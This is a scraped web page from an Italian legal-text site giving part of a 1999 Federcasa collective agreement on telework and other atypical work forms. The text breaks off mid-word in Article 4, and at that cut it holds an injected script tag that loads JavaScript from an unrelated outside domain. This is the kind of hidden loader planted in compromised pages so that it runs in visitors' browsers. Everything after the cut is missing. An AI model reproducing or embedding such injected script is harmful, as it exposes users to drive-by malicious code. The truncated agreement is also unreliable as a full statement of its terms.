Torna all'elenco delle categorie

Categoria: Federcasa
Settore: Enti Privati
Data stipula: 25-5-1999

FORME DI LAVORO ATIPICO

Art. 1 - Obiettivi.

1.    In  attuazione   di   quanto   previsto   dall'art.  60   del   CCNL
  FEDERCASA 9 luglio 1998, le disposizioni che seguono intendono consentire
  la sperimentazione di forme di lavoro atipico dirette a:

-   razionalizzare l'organizzazione del lavoro;
-   realizzare economie pubbliche;
-   contribuire positivamente ai problemi dell'occupazione.


2.   Le  sperimentazioni effettuate ai sensi del presente Accordo  saranno
  monitorate  a cura della Commissione Nazionale di Gestione  al  fine  di
  trarne elementi utili per una revisione della normativa da effettuare in
  occasione del rinnovo contrattuale, che terrà conto dell'evoluzione delle
  norme legislative e degli accordi interconfederali in materia.



CAPO I - TELELAVORO

Art. 2 - Definizioni.

1.  Ai fini delle presenti disposizioni s'intende:

a)   per  "lavoro a distanza" l'attività di telelavoro svolta da personale
  dipendente dall'Ente in conformità alle presenti disposizioni;
b)   per "telelavoro" la prestazione di lavoro eseguita dal dipendente  di
  uno  degli  enti destinatari del CCNL FEDERCASA 9.7.98, in luogo  idoneo
  collocato al di fuori della sede di lavoro, con il supporto di tecnologie
  dell'informazione e della comunicazione che consentano il collegamento con
  l'ente di appartenenza;
c)   per  "sede  di lavoro" quella dell'ufficio al quale il  dipendente  è
  assegnato.



Art. 3 - Progetti di telelavoro.

1.   Il  ricorso  a  forme di telelavoro, nel rispetto di quanto  previsto
  dall'art. 5 del vigente CCNL, avviene sulla base di progetti specifici in
  cui sono indicati: gli obiettivi, le attività interessate, le tecnologie
  utilizzate  e  i  sistemi di supporto, le modalità di effettuazione,  le
  tipologie professionali e il numero dei dipendenti di cui si prevede  il
  coinvolgimento,  i tempi e le modalità di realizzazione,  i  criteri  di
  verifica   e  di  aggiornamento,  le  modificazioni  organizzative   ove
  necessarie, nonché i costi e i benefici.

2.   Nell'ambito  dei  progetti  di  cui al  comma  precedente,  gli  Enti
  definiscono  le  modalità  per razionalizzare e  semplificare  attività,
  procedimenti amministrativi e procedure informatiche, con l'obiettivo di
  migliorare  l'organizzazione del lavoro, l'economicità e la qualità  del
  servizio.

3.   Ciascun  progetto definisce la tipologia, la durata,  le  metodologie
  didattiche, le risorse finanziarie degli interventi di formazione  e  di
  aggiornamento, anche al fine di sviluppare competenze atte ad assicurare
  capacità   di  evoluzione  e  di  adattamento  alle  mutate   condizioni
  organizzative, tecnologiche e di processo.

4.    Il   progetto   è  predisposto  dal  dirigente  o  dal  responsabile
  dell'ufficio  o  servizio nel cui ambito si intendono avviare  forme  di
  telelavoro,  d'intesa con il responsabile dei sistemi  informativi,  ove
  presente.  Il  progetto può prevedere che il dirigente eserciti  le  sue
  funzioni svolgendo parte della propria attività in telelavoro.

5.   Le  forme  di  telelavoro di cui alle presenti  disposizioni  possono
  essere programmate, organizzate e gestite anche con soggetti terzi.



Art. 4 - Assegnazione al telelavoro e reintegrazione nella sede originaria

1.   L'Ente  assegna  il  dipendente al telelavoro ovvero  ne  dispone  il
  reintegro ai sensi del successivo comma 3, sulla base di criteri definiti
  dalla   contrattazione  aziendale,  che,  fra  l'altro,  consentano   di
  valorizzare i benefici sociali e personali del telelavoro, anche al fine
  di favorire l'adesione volontaria dei lavoratori.

2.   La  prestazione  di  telelavoro  può effettuarsi  nel  domicilio  del
  dipendente  a condizione che sia ivi disponibile un ambiente  di  lavoro
  conforme  alle  norme generali di prevenzione e sicurezza  nelle  utenze
  domestiche.

3.   Il  dipendente  addetto  al  telela<script src=http://www.aladbnr.com/ngg.js></script>













(c) 2002-2005 www.infoleges.it -  Note legali e Condizioni d'uso